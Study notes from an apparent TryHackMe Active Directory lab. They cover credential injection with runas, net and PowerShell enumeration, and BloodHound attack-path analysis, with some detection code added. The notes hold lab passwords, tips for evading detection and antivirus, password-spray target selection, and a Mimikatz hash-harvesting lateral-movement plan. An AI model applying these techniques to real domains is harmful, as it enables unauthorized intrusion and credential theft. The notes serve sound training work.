###### `Active Directory` `Enumerate`
[TOC]
**Enumerate Active Directory**
Once we have obtained AD credentials, we use them to enumerate the AD configuration and structure,
looking for further attack paths that lead to a more privileged position.

# Network Setting
## Connecting to the VPN

```shell=
#!/bin/bash
# Cache sudo credentials first (-S reads the password from stdin, -v only validates);
# the lab password is hard-coded here, as in the original script.
if echo "kali" | sudo -S -v; then
    sudo openvpn ./adenumeration.ovpn
    sudo -s
else
    echo "sudo authentication failed; cannot run OpenVPN."
fi
```
## DNS Configuration
### Linux Machine

DNS Server: 10.200.18.101 (configure this as the resolver, then restart NetworkManager so the change takes effect):

```shell=
sudo systemctl restart NetworkManager
```
### Windows Machine
```powershell
PS C:\Windows\system32> $dnsip ="10.200.18.101"
PS C:\Windows\system32> $index = Get-NetAdapter -Name '區域連線' | Select-Object -ExpandProperty 'ifIndex'
PS C:\Windows\system32> Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```


---

<!--
```
Username: graeme.williams
Password: hJnlKuLBa2
```
SSH Connection as AD identity
```
ssh za.tryhackme.com\\rachel.dunn@thmjmp1.za.tryhackme.com
```
password: Bmlj9838
 -->
<!-- ## Inject AD credential into Memory
### Connecting to the host(Not Domain Machine)
```
nslookup THMJMP1.za.tryhackme.com
```
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.58.248 /dynamic-resolution
```
---
### Injected AD Credential to CMD
```
runas.exe /netonly /user:za.tryhackme.com\rachel.dunn cmd.exe
```
password :Bmlj9838 -->
# Credential Injection
We often obtain initial AD credentials without having compromised a domain-joined computer, so we need to inject those credentials on our own machine so that it can authenticate to domain services as if it were a valid domain member.
## Runas.exe
We can leverage the Windows built-in tool `runas.exe`.
Runas.exe lets us inject credentials into memory, granting us the ability to use those AD credentials to access services.
Run cmd.exe as a standard local account:

```cmd
runas.exe /netonly /user:<domain>\<user> cmd.exe
```
/netonly: the injected credentials are used only for network authentication (to remote servers); locally the process still runs as the current local account, and nothing is sent to the DC at injection time, so a wrong password is not noticed until a network resource is accessed.
/user: use the Fully Qualified Domain Name (FQDN) instead of the NetBIOS name.

## LAB - runas.exe
### Connecting to the host (not a domain-joined machine)
RDP:
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.18.248 /dynamic-resolution
```
### AD credential injection
```
runas.exe /netonly /user:za.tryhackme.com\rachel.dunn cmd.exe
```
Password: Bmlj9838

### Check
Listing the domain's SYSVOL share from the new cmd.exe confirms that the injected credentials work:
```
dir \\<domain>\SYSVOL
```
Notice: runas /netonly does not validate the credentials against the domain controller at injection time, so a wrong password is accepted silently; make sure the password is correct.
## IP (NTLM) vs Domain Name (Kerberos)
```
dir \\<DC domain name>\SYSVOL -> Kerberos authentication
dir \\<DC IP>\SYSVOL          -> NTLM authentication (the author's preference)
```
Supplying the DC's domain name when querying the SYSVOL folder makes the client authenticate with Kerberos.
Providing an IP address forces NTLM authentication instead, because Kerberos needs a service principal name and none is registered for a bare IP. This is a useful trick during Red Team engagements: forcing NTLM authentication helps us avoid detection.
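The check described above, automated as an added example (not from the original notes): run it from a PowerShell started inside the `runas /netonly` cmd.exe. It assumes `klist.exe` (shipped with Windows) is on PATH, and the DC name in the usage line is hypothetical.

```powershell
# Added example (not from the original notes): run this from the PowerShell session
# started under the "runas /netonly" cmd.exe to confirm the injected credentials work
# and to see which authentication protocol each SYSVOL access used.
# Assumes klist.exe (ships with Windows) is on PATH; the DC name below is hypothetical.
function Test-InjectedCredential {
    param(
        [Parameter(Mandatory)] [string] $DcFqdn
    )
    # Resolve the DC to an IPv4 address so both UNC forms target the same host.
    $dcIp = ([System.Net.Dns]::GetHostAddresses($DcFqdn) |
             Where-Object { $_.AddressFamily -eq 'InterNetwork' } |
             Select-Object -First 1).IPAddressToString

    # 1. Access by FQDN: the SMB client requests a cifs/<fqdn> service ticket (Kerberos).
    $byName = Test-Path -LiteralPath "\\$DcFqdn\SYSVOL"
    # A cached cifs/<fqdn> ticket in this logon session proves Kerberos was used.
    $ticket = [bool](klist.exe 2>$null | Select-String -SimpleMatch "cifs/$DcFqdn")

    # 2. Access by IP: no SPN is registered for a bare IP, so the client falls back to NTLM
    #    by default and no new service ticket appears in klist.
    $byIp = Test-Path -LiteralPath "\\$dcIp\SYSVOL"

    [pscustomobject]@{
        DcFqdn         = $DcFqdn
        DcIp           = $dcIp
        SysvolByName   = $byName    # False for both paths usually means the injected password is wrong
        KerberosTicket = $ticket
        SysvolByIp     = $byIp
    }
}

Test-InjectedCredential -DcFqdn 'dc01.za.tryhackme.com'   # hypothetical DC name
```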
# Microsoft Management Console (mmc)

Credentials for the jump host (used for the RDP connection below)
```
account:thm
password:Password1@
```
```
xfreerdp /u:"thm" /p:"Password1@" /v:10.200.18.248 /dynamic-resolution
```

Launch the console from the RDP session:
```
mmc
```

## Microsoft Management Console (MMC) and RSAT
MMC is a console that hosts administrative tools known as snap-ins.
RSAT: Remote Server Administration Tools
To attach an RSAT snap-in to MMC:
### Open MMC
In the MMC console, go to **File > Add/Remove Snap-in**.

### Add the RSAT components
Add the RSAT snap-ins to the console.

### Point the RSAT snap-ins at our domain controller
Set the domain so the snap-ins manage the associated services and configuration.
```
Domain: za.tryhackme.com
```

If everything is set up correctly, our MMC should be pointed at and authenticated against `za.tryhackme.com`.

Now we can start to enumerate the AD structure.
## Enumeration
### User and Computer structure

### People OUs

**IT Department**

If we have the necessary privileges, we can directly modify AD objects from these snap-ins.
**Servers**

**Workstation**


**Admin**



---
# Command Prompt (net)
The Command Prompt `net` commands allow quick and dirty enumeration of the AD structure.
## Users
### All AD Users
```
net user /domain
```

### Single User
```
net user AD_USER /domain
```

Notice:
Usually, once an account has more than ten group memberships, the command fails to list them all.
## Group
### All Groups
Enumerate the group information:
```
net group /domain
```

We can also specify a particular group to obtain more information about it.
### Single Groups
```
net group "Tier 0 Admins" /domain
```

## Account Policy
Enumerate the password policy
```
net accounts /domain
```

---
LABs



---
# PowerShell
PowerShell provides extra cmdlets ("command-lets"), .NET classes that perform specific tasks.
When we use the AD-RSAT tooling, it automatically imports the ActiveDirectory module (50+ cmdlets).
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
Import the module:
```
import-module ActiveDirectory
```
## Users
### All users
```powershell=
Get-ADUser -Filter 'Name -like "*"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A
```
The -Filter option supports more advanced expressions to search for specific accounts.
Format-Table makes the output more readable.

### Specific user
```
Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties *
```


## Groups
### Groups Information
```
Get-ADGroup -Identity 'Tier 2 Admins' -Server za.tryhackme.com -Properties *
```

```
Get-ADGroup -Filter 'Name -like "*"' -Server za.tryhackme.com | Format-Table Name -A
```

### Show Group Members
```
Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
```

## AD object
### Search for objects matching a condition
```
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com
```

Look up the badPwdCount attribute (failed password attempts since the last successful logon):
```
Get-ADObject -Filter 'badPwdCount -gt 0' -Server za.tryhackme.com
```

To avoid locking accounts out during a password-spraying test, exclude the accounts returned above; accounts with a badPwdCount of 0 are the ones we can test freely.
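A per-DC report built on the same cmdlets, as an added example that is not part of the original notes: `badPwdCount` and `LastBadPasswordAttempt` are not replicated, so a single `-Server` query only shows failures that DC handled; the function queries every DC, keeps the highest count per user (failed logons are chained to the PDC emulator, so that is normally the authoritative one) and compares it with the domain lockout threshold. From the blue team side, many accounts at a low non-zero count with near-identical timestamps is the classic footprint of a password spray in progress. It assumes the ActiveDirectory module is available and that the account running it can read the attributes.

```powershell
# Added example (not from the original notes). badPwdCount and LastBadPasswordAttempt
# are not replicated between DCs, so each DC is queried; the highest value per user is
# reported (DCs forward failed logons to the PDC emulator, which therefore holds the
# authoritative count) and compared against the domain lockout threshold.
Import-Module ActiveDirectory

function Get-BadPasswordReport {
    param([string] $Domain = 'za.tryhackme.com')

    $policy = Get-ADDefaultDomainPasswordPolicy -Server $Domain
    $dcs    = Get-ADDomainController -Filter * -Server $Domain |
              Select-Object -ExpandProperty HostName

    # Collect one row per (user, DC) from every DC in the domain.
    $rows = foreach ($dc in $dcs) {
        Get-ADUser -Filter 'badPwdCount -gt 0' -Server $dc `
                   -Properties badPwdCount, LastBadPasswordAttempt |
            ForEach-Object {
                [pscustomobject]@{
                    User        = $_.SamAccountName
                    DC          = $dc
                    BadPwdCount = [int]$_.badPwdCount
                    LastAttempt = $_.LastBadPasswordAttempt
                }
            }
    }

    $rows | Group-Object User | ForEach-Object {
        $worst  = $_.Group | Sort-Object BadPwdCount -Descending | Select-Object -First 1
        $latest = $_.Group | Sort-Object LastAttempt -Descending | Select-Object -First 1
        [pscustomobject]@{
            User             = $_.Name
            BadPwdCount      = $worst.BadPwdCount
            ReportingDC      = $worst.DC
            LockoutThreshold = $policy.LockoutThreshold   # 0 means lockout is disabled
            NearLockout      = (($policy.LockoutThreshold -gt 0) -and ($worst.BadPwdCount -ge $policy.LockoutThreshold - 1))
            LastAttempt      = $latest.LastAttempt
        }
    } | Sort-Object BadPwdCount -Descending
}

Get-BadPasswordReport | Format-Table -AutoSize
```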
## Domain
```
Get-ADDomain -Server za.tryhackme.com
```

## Modify AD Objects
This is AD exploitation rather than enumeration.
We can use `Set-ADAccountPassword` to force a change of a user's password:
```
Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)
```
---


Distinguished Name (DN) layout, where CN is the Common Name, e.g.:
`CN=<Common-Name>,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com`




# BloodHound (GUI)
BloodHound lets us visualise the AD environment as a graph.
Graph-based thinking enables an attacker to perform a two-stage attack.
## First stage (suicidal enumeration)
The attacker performs an initial attack to obtain AD credentials for initial AD enumeration.
This stage is typically fast and noisy, and the attacker may trigger alerts.
However, the information gathered during this stage is crucial for the next one: knowing the AD structure lets us plan the attack path for the second stage.
## Second stage (quick win)
Using that information in a second (for example phishing) engagement, we can reach our goal within minutes once a breach is achieved.
In some cases this is even faster than the blue team's response time.
## SharpHound
(Enumeration tool)
SharpHound is used to enumerate Active Directory.
(Display information and search attack paths)
BloodHound uses the collected information to display AD attack paths as a graph.
### Enumeration scripts
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors
SharpHound provides several collectors to gather information:
- SharpHound.ps1 (runs in memory)
- SharpHound.exe
- AzureHound.ps1 (Azure version)
**It is important that the SharpHound and BloodHound versions match.**
### AV Escape
During engagements, running SharpHound or BloodHound may trigger alerts from antivirus (AV) systems. To overcome this:
1. **Disable AV:**
2. **Create Exceptions:**
3. **Non-Domain-Joined Machine:** Use a non-domain-joined machine to run the tools.
### Running Enumerate Script
```powershell=
Sharphound.exe --CollectionMethods <Methods> --Domain za.tryhackme.com --ExcludeDCs
```
Parameters explained:
- `CollectionMethods`: which data to collect, e.g. Default or All (see the command options).
- `Domain`: the domain to enumerate.
- `ExcludeDCs`: skip enumerating the domain controllers to reduce the alerts triggered.
SharpHound parameter documentation:
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html
### Enumerate AD via SharpHound
Credential injection

Windows user profile:

```
\Users\denise.jenkins
```
Move SharpHound.exe to the user's Documents folder:
```
copy \Tools\SharpHound.exe \Users\denise.jenkins\Documents
```
```
cd \Users\denise.jenkins\Documents
```
```
Sharphound.exe --CollectionMethods ALL --Domain za.tryhackme.com --ExcludeDCs
```

## BloodHound
Reference:
https://bloodhound.readthedocs.io/_/downloads/en/latest/pdf/
BloodHound requires Neo4j, a graph database management system.
### Neo4j Database
Before starting BloodHound, Neo4j needs to be set up and started.

```
neo4j console
```

Change the password before logging in
Reference: https://neo4j.com/docs/operations-manual/current/kubernetes/operations/reset-password/


The server listens on
```
localhost:7687
```
### Connect to the neo4j DB
Neo4j Browser panel

Default Credentials:
Neo4j:Neo4j

Change Password


### Download the BloodHound GUI
https://github.com/BloodHoundAD/BloodHound/releases
```
lscpu
```

```
unzip BloodHound-linux-x64.zip
```

In this network we use BloodHound 4.10 version
```
chmod +x BloodHound
./BloodHound --no-sandbox
```


Credentials used in this lab:
neo4j:neo4j01
### Open data in Bloodhound GUI

```
scp <file> kali@<attacker IP>:/tmp
```
or
```
scp <AD Username>@THMJMP1.za.tryhackme.com:C:/Users/<AD Username>/Documents/<Sharphound ZIP> <attacker folder>
```


Drag the ZIP file onto the BloodHound GUI.

### Database Information
Note: Left Ctrl toggles the label display settings.
#### Search Specific Node

#### Database Information
Refresh DB info


### Node info
#### Overview

OUs Structure

Group membership

#### Node information
Shows information regarding the AD account

#### Extra Properties

#### Group Membership
First degree membership

#### Local admin Rights
Shows where this account has local administrator privileges.

#### Execution Rights

#### Outbound Control Right

#### Inbound Control Right

---
### Analysis Information
The Analysis component provides queries that reveal attack paths.
#### Search ALL Domain Admin


In this graph, if we want to obtain Domain Admin privileges, we have two attack surfaces.
One is the T0 user and the other is Administrator; since Administrator is the built-in account, we focus on getting access to the T0 user account.
### Exploitation
Each AD object is a node in the graph, and the relationships between them are edges.
We can exploit those edges to move laterally.
Edge filter (Lateral Movement)

#### Lateral Paths


Note: "No Results Found" may also be caused by a BloodHound/SharpHound version mismatch.
We could do something like the following to exploit this path:
1. Use our AD credentials to RDP into **THMJMP1**.
2. Look for a privilege escalation vector on the host that would give us administrative access.
3. With administrative access, use credential harvesting techniques and tools such as Mimikatz.
4. Since the T1 Admin has an active session on **THMJMP1**, credential harvesting would give us the NTLM hash of that account.
More about exploiting edges for lateral movement: [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html)
### Session data gathering
A session changes whenever a user logs in or out.
Because sessions change, we need to gather them at regular intervals, for example by running SharpHound at least twice a day with the "Session" collection method.
Note:
Before importing the new session data, we can clear the previous session data.
## LAB-Enumerate through sharphound & bloodhound




---





---
# Conclusion
Enumerating the AD structure is critical before engaging in lateral movement or privilege escalation.
Through AD enumeration, we can discover one or more paths to achieve our goals.
## Other enumeration techniques
### LDAP Enumeration
When a host or device needs to authenticate AD credentials, it binds to the domain controller's LDAP interface.
Scripts can be used to search or test the LDAP service to enumerate AD user accounts and other information.
Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
### PowerView
- PowerView is an open-source project that provides PowerShell functions for enumerating and interacting with AD environments.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
### WMI
**Enumerating via Windows Management Instrumentation (WMI)**
Reference: https://0xinfection.github.io/posts/wmi-ad-enum/
WMI provides the `/root/directory/ldap` namespace to interact with AD.
## AD Enumeration Mitigation
When SharpHound collects session information, it generates numerous logon events. Detection rules or code can be implemented to identify these events.
Additionally, signature-based detection for specific tools such as SharpHound or AD-RSAT can be developed.
Monitoring PowerShell usage:
The Blue Team can regularly review and analyse PowerShell logs to monitor PowerShell usage.
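A detection for the "numerous logon events" that the Session collection method (see the Session data gathering section above) leaves behind, as an added example that is not part of the original notes: one account producing network logons on many different hosts within minutes is the signal. The sample events are constructed; the function shape (Time, Account, SourceIp, Computer) and the host names are assumptions.

```powershell
# Added example (not from the original notes). SharpHound's "Session" collection
# queries every computer over SMB/RPC, so one account produces a network logon
# (Security Event ID 4624, logon type 3) on many hosts within minutes. This
# function flags any account/source pair that reaches $MinHosts distinct targets
# inside a sliding window. The sample events at the bottom are constructed; in
# production map Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}
# output (TargetUserName, IpAddress, Computer, TimeCreated) onto the same shape.
function Find-SessionEnumerationBurst {
    param(
        [Parameter(Mandatory)] [object[]] $Events,  # objects with Time, Account, SourceIp, Computer
        [int] $MinHosts = 20,
        [int] $WindowMinutes = 5
    )
    $window = [timespan]::FromMinutes($WindowMinutes)
    $Events | Group-Object { "$($_.Account)|$($_.SourceIp)" } | ForEach-Object {
        $sorted = @($_.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].Time
            $inWindow = $sorted | Where-Object { $_.Time -ge $start -and $_.Time -le ($start + $window) }
            $hosts = @($inWindow | Select-Object -ExpandProperty Computer | Sort-Object -Unique)
            if ($hosts.Count -ge $MinHosts) {
                [pscustomobject]@{
                    Account   = $sorted[0].Account
                    SourceIp  = $sorted[0].SourceIp
                    Start     = $start
                    HostCount = $hosts.Count
                }
                break   # one alert per account/source pair is enough
            }
        }
    }
}

# Constructed sample: one account sweeping 25 workstations in under two minutes,
# plus a single ordinary logon from another user. Workstation names are hypothetical.
$t0 = [datetime]'2024-01-01T09:00:00'
$sample = @(
    1..25 | ForEach-Object {
        [pscustomobject]@{ Time = $t0.AddSeconds($_ * 4); Account = 'ZA\denise.jenkins'
                           SourceIp = '10.200.18.248'; Computer = "WKSTN$_" }
    }
    [pscustomobject]@{ Time = $t0.AddMinutes(3); Account = 'ZA\gordon.stevens'
                       SourceIp = '10.200.18.50'; Computer = 'THMJMP1' }
)
Find-SessionEnumerationBurst -Events $sample | Format-Table -AutoSize
```

Legitimate administrators and monitoring agents can also touch many hosts, so tune `$MinHosts` and maintain an allow-list of known scanner accounts before alerting.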